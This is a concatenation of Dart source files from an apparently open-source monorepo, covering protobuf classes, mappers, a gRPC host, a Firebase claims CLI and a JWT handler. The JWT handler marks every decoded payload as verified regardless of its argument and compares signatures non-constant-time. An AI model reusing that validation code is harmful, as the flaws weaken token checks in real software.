[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromBuffer(i, r);
factory GListOfKey.fromJson($core.String i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromJson(i, r);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.deepCopy] instead. '
'Will be removed in next major version')
GListOfKey clone() => GListOfKey()..mergeFromMessage(this);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.rebuild] instead. '
'Will be removed in next major version')
GListOfKey copyWith(void Function(GListOfKey) updates) =>
super.copyWith((message) => updates(message as GListOfKey))
as GListOfKey; // ignore: deprecated_member_use
$pb.BuilderInfo get info_ => _i;
@$core.pragma('dart2js:noInline')
static GListOfKey create() => GListOfKey._();
GListOfKey createEmptyInstance() => create();
static $pb.PbList<GListOfKey> createRepeated() => $pb.PbList<GListOfKey>();
@$core.pragma('dart2js:noInline')
static GListOfKey getDefault() => _defaultInstance ??=
$pb.GeneratedMessage.$_defaultFor<GListOfKey>(create);
static GListOfKey? _defaultInstance;
@$pb.TagNumber(1)
$core.List<GKey> get items => $_getList(0);
}
<|start_filename|>squarealfa_security/lib/src/json_web_token_handler.dart<|end_filename|>
import 'dart:convert';
import 'package:crypto/crypto.dart';
import 'invalid_signature_exception.dart';
import 'invalid_token_exception.dart';
import 'jwt_payload.dart';
/// Generates and parses JWT tokens
class JsonWebTokenHandler {
final Hmac _hmac;
/// Constructs a [JsonWebTokenHandler] with the specified [key] for
/// signing the generated tokens and validating the tokens to be parsed.
JsonWebTokenHandler(String key) : _hmac = Hmac(sha256, utf8.encode(key));
/// Creates a new JWT token with a payload represented by [payload].
String generate(JwtPayload payload) {
var headerBase64 = _serializeHeader();
var payloadBase64 = _serializePayload(payload);
var signature = _sign(headerBase64, payloadBase64);
var ret = '$headerBase64.$payloadBase64.$signature';
return ret;
}
/// Parses a JWT token, validating it, and returns a [JwtPayload] representing
/// its contents.
JwtPayload load(String token) {
if (token.startsWith('Bearer ')) {
token = token.substring('Bearer '.length);
}
var parts = token.split('.');
if (parts.length != 3) {
throw InvalidTokenException(reason: 'Token should have 3 sections.');
}
var headerBase64 = parts[0];
var payloadBase64 = parts[1];
var checkSignature = _sign(headerBase64, payloadBase64);
var signature = parts[2];
if (checkSignature != signature) {
throw InvalidSignatureException();
}
var payload = deserializeJwtPayload(payloadBase64, true);
return payload;
}
String _sign(String headerBase64, String payloadBase64) {
var content = '$headerBase64.$payloadBase64';
var digest = _hmac.convert(utf8.encode(content));
var signature = base64Encode(digest.bytes);
signature = _adjustBase64(signature);
return signature;
}
static JwtPayload deserializeJwtPayload(
String payloadBase64, bool isVerified) {
final json = decodeB64Json(payloadBase64);
final map = jsonDecode(json);
final ret = JwtPayload.fromMap(map).copyWith(
isVerified: true,
);
return ret;
}
String _serializePayload(JwtPayload payload) {
final map = payload.claimsMap;
final json = jsonEncode(map);
final base64 = base64Encode(utf8.encode(json));
final adjustedBase64 = _adjustBase64(base64);
return adjustedBase64;
}
String _serializeHeader() {
var headerMap = <String, dynamic>{'alg': 'HS256', 'typ': 'JWT'};
var headerJson = jsonEncode(headerMap);
var headerBase64 = base64Encode(utf8.encode(headerJson));
headerBase64 = _adjustBase64(headerBase64);
return headerBase64;
}
String _adjustBase64(String base64Content) {
base64Content = Uri.encodeFull(base64Content);
while (base64Content.endsWith('=')) {
base64Content = base64Content.substring(0, base64Content.length - 1);
}
return base64Content;
}
}
String decodeB64Json(String payloadBase64) {
var delta4 = payloadBase64.length % 4;
if (delta4 > 0 && delta4 < 4) {
payloadBase64 =
payloadBase64.padRight(payloadBase64.length + (4 - delta4), '=');
}
var json = utf8.decode(base64Decode(payloadBase64));
return json;
}
<|start_filename|>firebase-auth-admin/lib/src/firebase_update_user.dart<|end_filename|>
import 'firebase_user_info.dart';
class FirebaseUpdateUser {
final FirebaseUserInfo info;
final String uid;
FirebaseUpdateUser({
required this.uid,
required this.info,
});
}
<|start_filename|>firebase-auth-admin/bin/firebase_auth_admin.dart<|end_filename|>
import 'package:firebase_auth_admin/firebase_auth_admin.dart' as firebase;
import 'command.dart';
void main(List<String> args) async {
try {
final command = Command.getCommand(args);
if (command == null) return;
firebase.initialize(command.commonOptions.privateKey);
switch (command.runtimeType) {
case SetCustomClaimsCommand:
await _setCustomClaims(command as SetCustomClaimsCommand);
break;
case GetCustomClaimsCommand:
await _getCustomClaims(command as GetCustomClaimsCommand);
}
} catch (ex) {
print('Error executing command.\n\nDetails:\n$ex');
}
}
Future<void> _setCustomClaims(SetCustomClaimsCommand command) async {
final uid = command.uid;
var claims = command.jsonMap != null
? command.jsonMap!
: (command.clear
? <String, dynamic>{}
: await firebase.getCustomClaims(uid));
if (!command.clear) {
for (final r in command.remove) {
claims.remove(r);
}
}
for (final a in command.add) {
final colonIx = a.indexOf(':');
final name = colonIx == -1 ? a : a.substring(0, colonIx);
final value = colonIx == -1 ? '' : a.substring(colonIx + 1);
claims[name] = value;
}
await firebase.setCustomClaims(uid, claims);
await _outputCustomClaims(uid, verb: 'Updated');
}
Future<void> _getCustomClaims(GetCustomClaimsCommand command) async {
final uid = command.uid;
await _outputCustomClaims(uid);
}
Future<void> _outputCustomClaims(String uid, {String verb = 'Current'}) async {
final claims = await firebase.getCustomClaims(uid);
print('$verb custom claims are:\n$claims');
}
<|start_filename|>proto_mapper/example/lib/src/ingredient.dart<|end_filename|>
import 'package:proto_annotations/proto_annotations.dart';
import 'grpc/ingredient.pb.dart';
part 'ingredient.g.dart';
@Proto()
@MapProto()
class Ingredient {
final String description;
final double quantity;
const Ingredient({
required this.description,
required this.quantity,
});
}
<|start_filename|>proto_mapper/proto_generator/lib/src/proto_mapper/field_code_generators/enum_field_code_generator.dart<|end_filename|>
import '../field_code_generator.dart';
import '../field_descriptor.dart';
class EnumFieldCodeGenerator extends FieldCodeGenerator {
EnumFieldCodeGenerator(
FieldDescriptor fieldDescriptor, {
String refName = FieldCodeGenerator.defaultRefName,
String protoRefName = FieldCodeGenerator.defaultProtoRefName,
}) : super(
fieldDescriptor,
refName: refName,
protoRefName: protoRefName,
) {
_prefix = fieldDescriptor.prefix;
}
String? _prefix;
@override
String get fromProtoNonNullableExpression =>
'''${fieldDescriptor.fieldElementTypeName}.values[$ref$fieldName.value]''';
@override
String get toProtoExpression =>
'''$_prefix${fieldDescriptor.fieldElementTypeName}
.valueOf($instanceReference.index)!''';
}
<|start_filename|>grpc_host/lib/src/services/authenticated_services.dart<|end_filename|>
import 'package:grpc/grpc.dart';
import 'package:grpc_host/grpc_host.dart';
import 'package:squarealfa_entity_adapter/squarealfa_entity_adapter.dart';
class AuthenticatedServices {
final ServiceCall call;
final Principal principal;
AuthenticatedServices(this.call) : principal = call.principal {
principal.throwIfUnauthenticated();
}
void throwOnError(ErrorList errors) {
if (errors.hasErrors) throw errors;
}
void throwUnauthorized() {
throw GrpcError.unauthenticated('Unauthorized');
}
void throwNotFound() {
throw GrpcError.notFound();
}
}
<|start_filename|>firebase-auth-admin/lib/src/firebase_create_user.dart<|end_filename|>
import 'firebase_user_info.dart';
class FirebaseCreateUser {
final FirebaseUserInfo info;
final String? uid;
const FirebaseCreateUser({
required this.info,
this.uid,
});
}
<|start_filename|>entity/entity_generator/lib/src/validation/field_descriptor.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
import 'package:source_gen/source_gen.dart';
import 'package:squarealfa_entity_annotations/squarealfa_entity_annotations.dart';
import 'package:squarealfa_generators_common/squarealfa_generators_common.dart';
class FieldDescriptor extends FieldElementDescriptorBase {
FieldDescriptor._(FieldElement fieldElement) : super(fieldElement);
factory FieldDescriptor.fromFieldElement(
ClassElement classElement,
FieldElement fieldElement,
) {
return FieldDescriptor._(
fieldElement,
);
}
bool get typeIsValidatable {
var annotation = TypeChecker.fromRuntime(Validatable)
.firstAnnotationOf(fieldElementType.element!);
return annotation != null;
}
bool get parameterTypeIsValidatable {
var annotation = TypeChecker.fromRuntime(Validatable)
.firstAnnotationOf(parameterType.element!);
return annotation != null;
}
}
<|start_filename|>map_mapper/map_mapper_annotations/lib/src/key_handler.dart<|end_filename|>
abstract class KeyHandler {
const KeyHandler();
void keyToMap(
Map<String, dynamic> map,
String value, [
String fieldName = '',
]);
String keyFromMap(
Map<String, dynamic> map, [
String fieldName = '',
]);
String fieldNameToMapKey(String fieldName);
}
<|start_filename|>grpc_host/example/grpc_host_example.dart<|end_filename|>
import 'package:grpc/grpc.dart';
import 'package:grpc_host/grpc_host.dart';
import 'demo_service.pbgrpc.dart';
void main() async {
final host = ExampleHost();
host.serve();
}
/// This class hosts the server, which will
/// will run several isolates, each waiting for
/// a gRPC connection to be established.
///
/// The number of isolates is a funcion of
/// the parameters defined by HostSettings,
/// isolatesMultiplier * the number of CPU
/// cores, plus the extraIsolates parameter.
class ExampleHost extends Host<String> {
ExampleHost() : super(ExampleHost.run);
@override
Settings<String> get settings {
final hostSettings = HostSettings(port: 9000, isolatesMultiplier: 2);
final settings = Settings<String>(hostSettings, appSettings: '');
return settings;
}
/// This method will be run for each of the spawned isolates
static void run(HostParameters<String> parms) async {
// It will launch the ExampleServicesHost instance
// that itself will finally host a set of
// services run by the isolate.
final host = ExampleServicesHost(parms);
await host.run();
}
}
class ExampleServicesHost extends ServicesHost {
ExampleServicesHost(HostParameters<String> parameters) : super(parameters);
@override
List<Service> get services => [GDemoService()];
}
class GDemoService extends GDemoServiceBase {
@override
Future<GPersonInsertResult> insertPerson(
ServiceCall call, GPerson request) async {
// insert the person in the database and return the result
// this is purely demonstrative.
final ret = GPersonInsertResult(key: request.key);
return ret;
}
}
<|start_filename|>nosql_repository/nosql_repository/lib/src/policy/create_policy.dart<|end_filename|>
import 'package:nosql_repository/nosql_repository.dart';
/// Defines authorization policy for
/// search operations.
///
/// The purpose of this class is to
/// expose the method [actionToDemandOnPrincipal]
/// that determines the required shares, containing
/// which action, that each entity that is
/// returned by a search operation is required
/// to have for that entity to be returned to the
/// user.
///
/// For example, if the method determines that
/// the action is 'read', then all search operations
/// will only return entities that have a share
/// with the 'read' action for the [principal]. If
/// the [actionToDemandOnPrincipal] returns an empty
/// string, then the search results are not limited
/// by the shares each entity has for the user.
///
/// This policy also determines whether results
/// are limited to the same tenant as the [principal]'s.
class CreatePolicy extends PermissionPolicy {
const CreatePolicy({
String permission = '',
bool filterByTenant = true,
}) : super(
permission,
filterByTenant,
);
const CreatePolicy.root() : super('', false);
bool isAuthorized(DbPrincipal principal) =>
permission == '' || principal.hasPermission(permission);
}
<|start_filename|>defaults_provider/test/test/map_mapper_generator_test.dart<|end_filename|>
//import 'package:decimal/decimal.dart';
import 'package:decimal/decimal.dart';
import 'package:map_mapper_generator_test/defaults_provider_generator_test.dart';
import 'package:map_mapper_generator_test/src/all_nullable.dart';
import 'package:test/test.dart';
void main() {
group('basic test', () {
test('Test Strings', () {
var defaultsProvider = $RecipeDefaultsProvider();
final recipe = defaultsProvider.createWithDefaults();
expect(recipe.key, '');
expect(recipe.title, '');
});
test('Test List', () {
var defaultsProvider = $RecipeDefaultsProvider();
final recipe = defaultsProvider.createWithDefaults();
expect(recipe.ingredients, []);
});
test('Test int', () {
var defaultsProvider = $RecipeDefaultsProvider();
final recipe = defaultsProvider.createWithDefaults();
expect(recipe.numPosts, 0);
});
test('Test double', () {
var defaultsProvider = $RecipeDefaultsProvider();
final recipe = defaultsProvider.createWithDefaults();
expect(recipe.doubleNumPosts, 0.0);
});
test('Test decimal', () {
var defaultsProvider = $RecipeDefaultsProvider();
final recipe = defaultsProvider.createWithDefaults();
expect(recipe.decimalNumPosts, Decimal.zero);
});
test('Test recursion default', () {
var defaultsProvider = $RecipeDefaultsProvider();
var ingredientDefaultsProvider = $IngredientDefaultsProvider();
final recipe = defaultsProvider.createWithDefaults();
final defaultIngredient = ingredientDefaultsProvider.createWithDefaults();
expect(recipe.mainIngredient.description, defaultIngredient.description);
expect(recipe.mainIngredient.quantity, defaultIngredient.quantity);
});
test('Test override', () {
var defaultsProvider = $RecipeDefaultsProvider();
final recipe = defaultsProvider.createWithDefaults();
expect(recipe.category.title, 'my category');
});
test('Test all nullable', () {
var defaultsProvider = $AllNullableDefaultsProvider();
final an = defaultsProvider.createWithDefaults();
expect(an.prop1, isNull);
expect(an.prop2, isNull);
});
});
}
<|start_filename|>generators_common/lib/src/dart_type_extensions.dart<|end_filename|>
import 'package:analyzer/dart/element/type.dart';
extension TypeExtensions on DartType {
DartType get finalType {
var type = this;
while (type is ParameterizedType && type.typeArguments.isNotEmpty) {
type = type.typeArguments.first;
}
return type;
}
DartType get futureType {
var type = this;
if (type is ParameterizedType &&
type.typeArguments.isNotEmpty &&
type.isDartAsyncFuture) return type.typeArguments.first;
return type;
}
bool get isList {
var type = this;
while (type is ParameterizedType && type.typeArguments.isNotEmpty) {
if (type.isDartCoreList) {
return true;
}
type = type.typeArguments.first;
}
return false;
}
bool get isIterable {
var type = this;
while (type is ParameterizedType && type.typeArguments.isNotEmpty) {
if (type.isDartCoreIterable) {
return true;
}
type = type.typeArguments.first;
}
return false;
}
bool get isSet {
var type = this;
while (type is ParameterizedType && type.typeArguments.isNotEmpty) {
if (type.isDartCoreSet) {
return true;
}
type = type.typeArguments.first;
}
return false;
}
}
<|start_filename|>arango_driver/lib/src/query/query_text_fragment.dart<|end_filename|>
abstract class QueryTextFragment {
final String line;
QueryTextFragment(this.line);
@override
String toString() => line;
}
<|start_filename|>grpc_host/lib/src/hosting/principal_interceptor.dart<|end_filename|>
import 'dart:async';
import 'package:grpc/grpc.dart';
import 'package:grpc_host/grpc_host.dart';
import 'package:squarealfa_security/squarealfa_security.dart';
abstract class PrincipalInterceptor {
/// Loads a JWT and validates it returning the payload.
Future<JwtPayload> getTokenPayload(String idToken);
/// Creates a principal that contains user identity and authorization
/// from a JWT payload.
Future<Principal> createPrincipal(JwtPayload payload);
FutureOr<GrpcError?> interceptor(
ServiceCall call,
ServiceMethod method,
) async {
await call.authenticate(
getTokenPayload: getTokenPayload,
createPrincipal: createPrincipal,
);
}
}
<|start_filename|>proto_mapper/test/lib/src/recipe_type.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'recipe_type.dart';
// **************************************************************************
// ProtoMapperGenerator
// **************************************************************************
class $RecipeTypesProtoMapper
implements ProtoMapper<RecipeTypes, GRecipeTypes> {
const $RecipeTypesProtoMapper();
@override
RecipeTypes fromProto(GRecipeTypes proto) => RecipeTypes.values[proto.value];
@override
GRecipeTypes toProto(RecipeTypes entity) =>
GRecipeTypes.valueOf(entity.index)!;
}
extension $GRecipeTypesProtoExtension on GRecipeTypes {
RecipeTypes toRecipeTypes() =>
const $RecipeTypesProtoMapper().fromProto(this);
}
<|start_filename|>generators_common/lib/src/field_element_descriptor_base.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
import 'package:squarealfa_generators_common/src/field_descriptor_base.dart';
/// Enhanced information over a [FieldElement]
class FieldElementDescriptorBase extends FieldDescriptorBase {
final FieldElement fieldElement;
FieldElementDescriptorBase(this.fieldElement)
: super.fromFieldElement(fieldElement);
}
<|start_filename|>map_mapper/test_mongo/lib/src/lists_host.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'lists_host.dart';
// **************************************************************************
// MapMapGenerator
// **************************************************************************
class $ListsHostMapMapper extends MapMapper<ListsHost> {
const $ListsHostMapMapper();
@override
ListsHost fromMap(Map<String, dynamic> map) {
return ListsHost(
vbools: List<bool>.unmodifiable(map['vbools']),
nvbools: map['nvbools'] == null
? null
: List<bool>.unmodifiable(map['nvbools']),
vstrings: List<String>.unmodifiable(map['vstrings']),
nvstrings: map['nvstrings'] == null
? null
: List<String>.unmodifiable(map['nvstrings']),
vdurations: List<Duration>.unmodifiable(map['vdurations']),
nvdurations: map['nvdurations'] == null
? null
: List<Duration>.unmodifiable(map['nvdurations']),
vdatetimes: List<DateTime>.unmodifiable(map['vdatetimes']),
nvdatetimes: map['nvdatetimes'] == null
? null
: List<DateTime>.unmodifiable(map['nvdatetimes']),
vdecimals: List<Decimal>.unmodifiable(map['vdecimals']),
nvdecimals: map['nvdecimals'] == null
? null
: List<Decimal>.unmodifiable(map['nvdecimals']),
vints: List<int>.unmodifiable(map['vints']),
nvints:
map['nvints'] == null ? null : List<int>.unmodifiable(map['nvints']),
vdoubles: List<double>.unmodifiable(map['vdoubles']),
nvdoubles: map['nvdoubles'] == null
? null
: List<double>.unmodifiable(map['nvdoubles']),
vapplianceTypes: List<ApplianceType>.unmodifiable(map['vapplianceTypes']
.map((e) => const $ApplianceTypeMapMapper().fromMap(e))),
nvapplianceTypes: map['nvapplianceTypes'] == null
? null
: List<ApplianceType>.unmodifiable(map['nvapplianceTypes']
.map((e) => const $ApplianceTypeMapMapper().fromMap(e))),
);
}
@override
Map<String, dynamic> toMap(ListsHost instance) {
final map = <String, dynamic>{};
map['vbools'] = instance.vbools;
map['nvbools'] = instance.nvbools;
map['vstrings'] = instance.vstrings;
map['nvstrings'] = instance.nvstrings;
map['vdurations'] = instance.vdurations;
map['nvdurations'] = instance.nvdurations;
map['vdatetimes'] = instance.vdatetimes;
map['nvdatetimes'] = instance.nvdatetimes;
map['vdecimals'] = instance.vdecimals;
map['nvdecimals'] = instance.nvdecimals;
map['vints'] = instance.vints;
map['nvints'] = instance.nvints;
map['vdoubles'] = instance.vdoubles;
map['nvdoubles'] = instance.nvdoubles;
map['vapplianceTypes'] = instance.vapplianceTypes
.map((e) => const $ApplianceTypeMapMapper().toMap(e))
.toList();
map['nvapplianceTypes'] = instance.nvapplianceTypes == null
? null
: instance.nvapplianceTypes!
.map((e) => const $ApplianceTypeMapMapper().toMap(e))
.toList();
return map;
}
}
extension $ListsHostMapExtension on ListsHost {
Map<String, dynamic> toMap() => const $ListsHostMapMapper().toMap(this);
static ListsHost fromMap(Map<String, dynamic> map) =>
const $ListsHostMapMapper().fromMap(map);
}
extension $MapListsHostExtension on Map<String, dynamic> {
ListsHost toListsHost() => const $ListsHostMapMapper().fromMap(this);
}
class $ListsHostFieldNames {
final String fieldName;
final String prefix;
$ListsHostFieldNames.sub(this.fieldName) : prefix = fieldName + '.';
const $ListsHostFieldNames()
: fieldName = '',
prefix = '';
static const _vbools = 'vbools';
String get vbools => prefix + _vbools;
static const _nvbools = 'nvbools';
String get nvbools => prefix + _nvbools;
static const _vstrings = 'vstrings';
String get vstrings => prefix + _vstrings;
static const _nvstrings = 'nvstrings';
String get nvstrings => prefix + _nvstrings;
static const _vdurations = 'vdurations';
String get vdurations => prefix + _vdurations;
static const _nvdurations = 'nvdurations';
String get nvdurations => prefix + _nvdurations;
static const _vdatetimes = 'vdatetimes';
String get vdatetimes => prefix + _vdatetimes;
static const _nvdatetimes = 'nvdatetimes';
String get nvdatetimes => prefix + _nvdatetimes;
static const _vdecimals = 'vdecimals';
String get vdecimals => prefix + _vdecimals;
static const _nvdecimals = 'nvdecimals';
String get nvdecimals => prefix + _nvdecimals;
static const _vints = 'vints';
String get vints => prefix + _vints;
static const _nvints = 'nvints';
String get nvints => prefix + _nvints;
static const _vdoubles = 'vdoubles';
String get vdoubles => prefix + _vdoubles;
static const _nvdoubles = 'nvdoubles';
String get nvdoubles => prefix + _nvdoubles;
static const _vapplianceTypes = 'vapplianceTypes';
String get vapplianceTypes => prefix + _vapplianceTypes;
static const _nvapplianceTypes = 'nvapplianceTypes';
String get nvapplianceTypes => prefix + _nvapplianceTypes;
@override
String toString() => fieldName;
}
<|start_filename|>firebase-auth-admin/lib/src/firebase_user_info.dart<|end_filename|>
class FirebaseUserInfo {
final String? email;
final bool? emailVerified;
final String? displayName;
final String? password;
final bool? disabled;
final String? phoneNumber;
final String? photoUrl;
const FirebaseUserInfo({
this.email,
this.emailVerified,
this.displayName,
this.password,
this.disabled,
this.phoneNumber,
this.photoUrl,
});
FirebaseUserInfo copyWith({
String? email,
bool? emailVerified,
String? displayName,
String? password,
bool? disabled,
String? phoneNumber,
String? photoUrl,
}) {
return FirebaseUserInfo(
email: email ?? this.email,
emailVerified: emailVerified ?? this.emailVerified,
displayName: displayName ?? this.displayName,
password: password ?? <PASSWORD>,
disabled: disabled ?? this.disabled,
phoneNumber: phoneNumber ?? this.phoneNumber,
photoUrl: photoUrl ?? this.photoUrl,
);
}
}
<|start_filename|>arango_driver/lib/src/collection_criteria.dart<|end_filename|>
import 'package:arango_driver/arango_driver.dart';
class CollectionCriteria {
final String name;
final bool waitForSync;
final CollectionType collectionType;
const CollectionCriteria(
this.name, {
this.waitForSync = false,
this.collectionType = CollectionType.document,
});
const CollectionCriteria.namedArgs({
required this.name,
this.waitForSync = false,
this.collectionType = CollectionType.document,
});
}
<|start_filename|>firebase-auth-admin/bin/command.dart<|end_filename|>
import 'package:args/args.dart';
import 'common_options.dart';
import 'get_custom_claims_command.dart';
import 'set_custom_claims_command.dart';
export 'set_custom_claims_command.dart';
export 'get_custom_claims_command.dart';
class Command {
final CommonOptions commonOptions;
Command(this.commonOptions);
static Command? getCommand(List<String> args) {
final parser = ArgParser();
_prepare(parser);
final command = _parse(parser, args);
return command;
}
static Command? _parse(ArgParser parser, List<String> args) {
try {
var results = parser.parse(args);
if (results['help']) {
_showHelp(parser);
return null;
}
final pk = results['private-key'];
final co = CommonOptions(privateKey: pk);
final command = results.command;
if (command == null) {
_showHelp(parser);
return null;
}
switch (command.name) {
case 'getCustomClaims':
return GetCustomClaimsCommand.fromResults(co, command);
case 'setCustomClaims':
return SetCustomClaimsCommand.fromResults(co, command);
default:
_showHelp(parser);
return null;
}
} catch (_) {
_showHelp(parser);
return null;
}
}
static void _prepare(ArgParser parser) {
parser.addFlag(
'help',
abbr: 'h',
help: 'Display this help',
);
parser.addOption('private-key',
abbr: 'p',
defaultsTo: 'service-account.json',
help: 'Path to the services private key file.');
SetCustomClaimsCommand.addCommand(parser);
GetCustomClaimsCommand.addCommand(parser);
}
}
void _showHelp(ArgParser parser) {
print('Usage: firebase-auth [-h][-p] <commands>');
print(parser.usage);
print('');
print('Available commands:');
for (final cpKey in parser.commands.keys) {
print(' - $cpKey');
}
print('');
for (final cpKey in parser.commands.keys) {
final commandParser = parser.commands[cpKey];
if (commandParser == null) continue;
print('');
print('$cpKey usage:');
print(commandParser.usage);
}
}
<|start_filename|>firebase-auth-admin/lib/firebase_auth_admin.dart<|end_filename|>
/// Support for doing something awesome.
///
/// More dartdocs go here.
library firebase_auth_admin;
export 'src/firebase_auth_admin.dart';
export 'src/firebase_create_user.dart';
export 'src/firebase_update_user.dart';
export 'src/firebase_user_info.dart';
export 'src/firebase_admin_exception.dart';
export 'src/firebase_token.dart';
<|start_filename|>proto_mapper/proto_generator/lib/src/proto_mapper/field_code_generators/bool_field_code_generator.dart<|end_filename|>
import '../field_code_generator.dart';
import '../field_descriptor.dart';
class BoolFieldCodeGenerator extends FieldCodeGenerator {
BoolFieldCodeGenerator(
FieldDescriptor fieldDescriptor, {
String refName = FieldCodeGenerator.defaultRefName,
String protoRefName = FieldCodeGenerator.defaultProtoRefName,
}) : super(
fieldDescriptor,
refName: refName,
protoRefName: protoRefName,
);
}
<|start_filename|>firebase-auth-admin/go/build.bat<|end_filename|>
go build -buildmode=c-shared -o lib-auth.dll auth.go
<|start_filename|>grpc_host/lib/src/configuration/configuration.dart<|end_filename|>
export 'file_yaml_extension.dart';
export 'host_settings.dart';
export 'smtp_settings.dart';
export 'token_settings.dart';
export 'settings.dart';
<|start_filename|>entity_adapter/example/lib/grpc/asset.pb.dart<|end_filename|>
///
// Generated code. Do not modify.
// source: asset.proto
//
// @dart = 2.12
// ignore_for_file: annotate_overrides,camel_case_types,unnecessary_const,non_constant_identifier_names,library_prefixes,unused_import,unused_shown_name,return_of_invalid_type,unnecessary_this,prefer_final_fields
import 'dart:core' as $core;
import 'package:protobuf/protobuf.dart' as $pb;
class GAsset extends $pb.GeneratedMessage {
static final $pb.BuilderInfo _i = $pb.BuilderInfo(
const $core.bool.fromEnvironment('protobuf.omit_message_names')
? ''
: 'GAsset',
createEmptyInstance: create)
..aOS(
1,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'description')
..aOS(
2,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'value')
..hasRequiredFields = false;
GAsset._() : super();
factory GAsset({
$core.String? description,
$core.String? value,
}) {
final _result = create();
if (description != null) {
_result.description = description;
}
if (value != null) {
_result.value = value;
}
return _result;
}
factory GAsset.fromBuffer($core.List<$core.int> i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromBuffer(i, r);
factory GAsset.fromJson($core.String i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromJson(i, r);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.deepCopy] instead. '
'Will be removed in next major version')
GAsset clone() => GAsset()..mergeFromMessage(this);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.rebuild] instead. '
'Will be removed in next major version')
GAsset copyWith(void Function(GAsset) updates) =>
super.copyWith((message) => updates(message as GAsset))
as GAsset; // ignore: deprecated_member_use
$pb.BuilderInfo get info_ => _i;
@$core.pragma('dart2js:noInline')
static GAsset create() => GAsset._();
GAsset createEmptyInstance() => create();
static $pb.PbList<GAsset> createRepeated() => $pb.PbList<GAsset>();
@$core.pragma('dart2js:noInline')
static GAsset getDefault() =>
_defaultInstance ??= $pb.GeneratedMessage.$_defaultFor<GAsset>(create);
static GAsset? _defaultInstance;
@$pb.TagNumber(1)
$core.String get description => $_getSZ(0);
@$pb.TagNumber(1)
set description($core.String v) {
$_setString(0, v);
}
@$pb.TagNumber(1)
$core.bool hasDescription() => $_has(0);
@$pb.TagNumber(1)
void clearDescription() => clearField(1);
@$pb.TagNumber(2)
$core.String get value => $_getSZ(1);
@$pb.TagNumber(2)
set value($core.String v) {
$_setString(1, v);
}
@$pb.TagNumber(2)
$core.bool hasValue() => $_has(1);
@$pb.TagNumber(2)
void clearValue() => clearField(2);
}
class GListOfAsset extends $pb.GeneratedMessage {
static final $pb.BuilderInfo _i = $pb.BuilderInfo(
const $core.bool.fromEnvironment('protobuf.omit_message_names')
? ''
: 'GListOfAsset',
createEmptyInstance: create)
..pc<GAsset>(
1,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'items',
$pb.PbFieldType.PM,
subBuilder: GAsset.create)
..hasRequiredFields = false;
GListOfAsset._() : super();
factory GListOfAsset({
$core.Iterable<GAsset>? items,
}) {
final _result = create();
if (items != null) {
_result.items.addAll(items);
}
return _result;
}
factory GListOfAsset.fromBuffer($core.List<$core.int> i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromBuffer(i, r);
factory GListOfAsset.fromJson($core.String i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromJson(i, r);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.deepCopy] instead. '
'Will be removed in next major version')
GListOfAsset clone() => GListOfAsset()..mergeFromMessage(this);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.rebuild] instead. '
'Will be removed in next major version')
GListOfAsset copyWith(void Function(GListOfAsset) updates) =>
super.copyWith((message) => updates(message as GListOfAsset))
as GListOfAsset; // ignore: deprecated_member_use
$pb.BuilderInfo get info_ => _i;
@$core.pragma('dart2js:noInline')
static GListOfAsset create() => GListOfAsset._();
GListOfAsset createEmptyInstance() => create();
static $pb.PbList<GListOfAsset> createRepeated() =>
$pb.PbList<GListOfAsset>();
@$core.pragma('dart2js:noInline')
static GListOfAsset getDefault() => _defaultInstance ??=
$pb.GeneratedMessage.$_defaultFor<GListOfAsset>(create);
static GListOfAsset? _defaultInstance;
@$pb.TagNumber(1)
$core.List<GAsset> get items => $_getList(0);
}
<|start_filename|>proto_mapper/test/lib/src/calc_result.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'calc_result.dart';
// **************************************************************************
// ProtoMapperGenerator
// **************************************************************************
class $CalcResultProtoMapper implements ProtoMapper<CalcResult, GCalcResult> {
const $CalcResultProtoMapper();
@override
CalcResult fromProto(GCalcResult proto) => _$CalcResultFromProto(proto);
@override
GCalcResult toProto(CalcResult entity) => _$CalcResultToProto(entity);
CalcResult fromJson(String json) =>
_$CalcResultFromProto(GCalcResult.fromJson(json));
String toJson(CalcResult entity) => _$CalcResultToProto(entity).writeToJson();
String toBase64Proto(CalcResult entity) =>
base64Encode(utf8.encode(entity.toProto().writeToJson()));
CalcResult fromBase64Proto(String base64Proto) =>
GCalcResult.fromJson(utf8.decode(base64Decode(base64Proto)))
.toCalcResult();
}
GCalcResult _$CalcResultToProto(CalcResult instance) {
var proto = GCalcResult();
proto.result = instance.result;
return proto;
}
CalcResult _$CalcResultFromProto(GCalcResult instance) => CalcResult(
result: instance.result,
);
extension $CalcResultProtoExtension on CalcResult {
GCalcResult toProto() => _$CalcResultToProto(this);
String toJson() => _$CalcResultToProto(this).writeToJson();
static CalcResult fromProto(GCalcResult proto) =>
_$CalcResultFromProto(proto);
static CalcResult fromJson(String json) =>
_$CalcResultFromProto(GCalcResult.fromJson(json));
}
extension $GCalcResultProtoExtension on GCalcResult {
CalcResult toCalcResult() => _$CalcResultFromProto(this);
}
<|start_filename|>arango_driver/lib/src/index_criteria.dart<|end_filename|>
class IndexCriteria {
final String collectionName;
final String indexName;
final Iterable<String> fieldNames;
final bool unique;
